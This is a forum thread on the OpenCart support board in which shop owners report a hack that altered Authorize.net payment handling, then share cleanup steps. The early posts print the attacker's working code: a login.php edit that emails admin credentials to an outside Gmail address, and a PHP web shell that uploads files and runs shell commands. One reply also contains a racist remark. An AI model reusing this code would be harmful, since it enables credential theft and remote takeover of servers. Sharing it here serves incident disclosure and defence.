Page 1 of 1

Admin password hack + Authorize.net

Posted: Mon Jul 06, 2015 10:30 pm
by tonybarnes
OC 1.5.5.1

Just discovered some little shitbag got into our site through the /download vulnerability. I'd thought I'd secured that, so have now deleted that directory, turned off downloads, and reset main account password (server level).

Digging around I found that they had set up authorize.net to send credit card details to a yopmail account. Sorted that. Changed all passwords, etc.

By pure luck after removing the /downloads folder I got an error message in the admin that prompted me to look in the admin/controller/common folder... little fucker had edited login.php too!! Haven't seen anyone else report this - pretty simple script edit that emails through login info:

Code: Select all

protected function validate() {
		if (isset($this->request->post['username']) && isset($this->request->post['password']) && !$this->user->login($this->request->post['username'], $this->request->post['password'])) {
			$this->error['warning'] = $this->language->get('error_login');
		}
		
		if (!$this->error) {
$smail=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."|".$this->request->post['username']."|".$this->request->post['password'];
mail("thankforyourhelp2015@gmail.com","OUR-SITE",$smail,"From: OUR-SITE@fly.com\r\nReply-to: thankforyourhelp2015@gmail.com");
			return true;
		} else {
			return false;
		}
	}
So as soon as I updated things, he knew our new credentials!!! :choke: :crazy:

I'm trapsing through file edit dates now to see if anything else compromised, but one to look out for guys and gals!!

Re: Admin password hack + Authorize.net

Posted: Mon Jul 06, 2015 11:03 pm
by tonybarnes
Ok here's a full list of changed files that I found:

/admin/controller/extension/payment.php
/admin/controller/common/login.php
/admin/controller/extension/payment.php
/catalog/controller/product/product.php
/catalog/controller/payment/authorizenet_aim.php
/catalog/controller/payment/authorizenet_sim.php
/catalog/controller/payment/pp_pro.php
/downloads/ - various stuff in here
/image/flags/index.php

Couldn't spot what had actually changed in the payment & pp_pro ones (didn't look that hard TBH), this was contents of /image/flags/index.php

Code: Select all

<?php
if(@$_REQUEST["id"]== 'mm')
{
$files = @$_FILES["files"];
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>shell</a></h1>";
}
}
exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
} 
if(@$_REQUEST["id"]== 'nn')
{
system($_GET["cmd"]);
}
?>

Re: Admin password hack + Authorize.net

Posted: Tue Jul 07, 2015 4:56 am
by Dhaupin
Thanks for sharing some snippets related to this.

I dont know if it's related, but some brown dude uploaded this. He has been making rounds testing for payment gateways and/or trying to fraud to US addresses. Could be the same one who keeps trying to inject into a honeypot OC download folder and/or the same one who dropped that hack....potentially :D

Re: Admin password hack + Authorize.net

Posted: Wed Jul 15, 2015 11:02 pm
by tonybarnes
lmao - just chilling!

Re: Admin password hack + Authorize.net

Posted: Fri Jun 03, 2016 10:59 pm
by TofuMan
Hi - I just wanted to firstly thank you tonybarns for detailing how you fixed your hack - it happened to us in January on v1.5.6 and your post was very helpful at tidying things up again.

Now on OpenCart v2, we have had the Authorize.net hack again - seemingly identical. So I am not sure if this does use the 'download vulnerability'...

I have posted on another thread about his hack - but I think it may be helpful to post here too as it came up in Google searches. :-)

We had the same symptoms: when you go to the checkout 'Authorize.net' appears as a payment option above all others... when the customer chooses it the payment cannot be made as it does not direct to a live account... but it may allow the hacker to obtain customer data... we cannot determine exactly what he was trying to get!

For anyone reading this who has this problem... please note the following:

1. VERY IMPORTANT: The login page has been hacked!
The login page code has been edited so that if you try and change the passwords, when you login again the Hacker receives the new password directly to his email account.

2. You CANNOT enable/disable Authorize.net via OpenCart admin.
The hack uses a file that by-passes this function completely so it has nothing to do with the payment settings you have set up. You must delete/replace hacked files via FTP to restore normal function.

3. You will have to fix this problem via FTP by locating and overwriting the changed files then changing your password (ideally through PhpMyAdmin). There is no point changing your passwords until AFTER you fix the login page hack.

We do not believe this hack requires the hacker is able to login... but we cannot be sure. In v1.5.6 we found all sorts of junk had been uploaded to the server... but I do not think this is the 'download vulnerability' people spoke about before as we are in V2 and we had already removed the list of file types that could be uploaded.

Here is how we fixed it:

Firstly, we had to find all the files that had been changed by the hacker... you will see that these have a 'Last modified' date that will be very recent compared to the other files (most of which will be the same date from the time of installation).

We found on both occasions that these were the files that had been changed:

/admin/controller/extension/payment.php
/admin/controller/common/login.php
/catalog/controller/payment/authorizenet_aim.php

However, we would advise you to check through the folders for any other new or recently modified files if the following instructions do not fix your problem.

We had a copy of the website elsewhere so we could see that not only were the last modified dates 'today' but the file sizes were notably different - so the code was not the same.

We suggest you take a full backup of your site via FTP - name it clearly as a 'hacked' version not to be re-uploaded.

Once this is done unzip a new local copy of your version of OpenCart... locate the the files listed above and copy them to a folder & subfolders (we called ours 'Authorize Hack Clean Files') . You will then be able to quickly upload if it ever happens again.

Then delete the files on the server and replace with the 'clean' files - this should be enough to fix the problem.

Please note:
You cannot simply rename the authorizenet_aim.php file - even if you change the name and remove the file extension - we found it kept loading the Authorize.net option in the checkout. It must be completely removed.

Once those changes are done, you can set up a new password for your accounts. We used a secure password generator to try and make it more certain it was not a hack via password login... we don't think it is... but we do not know how this hack is done.

Lastly we deleted all the allowed file types and meme types in the Settings > Uploads... we kept a copy of these lists in case we need to put any/all of them back again.

I hope these details help a few people out - i would really appreciate anyone listing any 'official' name for this hack as it seems to be happening often enough and in the same way, I imagine it has been identified by others too?

Re: Admin password hack + Authorize.net

Posted: Sat Sep 29, 2018 12:28 am
by siteadvice
Anyone have any further information on what security issue hackers are exploiting to be able to get access at this level?

Re: Admin password hack + Authorize.net

Posted: Sat Sep 29, 2018 1:51 pm
by IP_CAM
Well, the main OC User Problem might be, that only a small fraction of them
has much knowledge about what they're doing, in addition so-called Dev's,
and this makes it easy for Hackers, to do all kinds of things on such Sites! :laugh:
Just to give you an example of 'wide open' CHMOD 777 OC Sites: :choke:
https://www.google.com/search?q=%22index+of%22+Opencart

In addition, some Extensions might contain badcode, once in a while, but
since many Users don't know a thing, they are unable, to find out, where to
look, and how such Code looks like, in the first place. Many Dark-Net Sites
also offer paid OC Code for free, or almost free, and OC Users are unaware of,
that the People behind such 'offerings' usually have some plans, related to
hard cash, in one or the other way, so, it's usually not clean OC-Code related,
if a Site suddenly runs into such problems.

But, strictly technically/logically, one should not have a single Piece of Code
on a Server, wich is not used in real as well, like Authorizenet, Openbay, Amazon,
and/or other Payment/Shipping/Whatever 'Functions', but only have installed,
what is required to use. But since some of those Extensions are 'hardcoded' into
the Source, it's not so easy, to remove them all, without a certain knowledge about OC.

I am just now in the process of testing a Shop Site, where I removed Authorizenet,
Ebay, Openbay, and Amazon from the Source yesterday. it worked on spot, and if I am
lucky, then I won't find many misses, due to either removing too much, or too less,
in certain files, containing some Code or Scripts, related with those 'Functions'.
http://www.ejacob.ch/cart/

But even Facebook got hit, so, there is always a chance, to get hacked. Especially for
those OC Users, allowing others to upload images and/or other files. I just found one
of those strange images, placed in a free Theme Extension, full of Code, and I only
found out about, because I wondered about it's sheer size, for a simple Background
Image. So, I had to make use of my famous Image STRIPPER Program again, to get all not
'required' Code out of all of my Shop Images, and thereby make 'em a little smaller in
Size as well. :D

Ernie

Re: Admin password hack + Authorize.net

Posted: Tue Oct 09, 2018 9:43 am
by Parmodya
Can anyone check for security vulnerability on my site https://rvnb.in/tsf-police-shoes-black-colour/

It is a tsf shoes store

Re: Admin password hack + Authorize.net

Posted: Wed Oct 10, 2018 1:36 am
by IP_CAM
Well, this Code is far from even beeing comparable with the OC Default way of
doing things, it's all highly Custom Code, from the top down to the bottom. 8)
So, nobody would be able, to assist in anything, I fear ...
Good Luck!
Ernie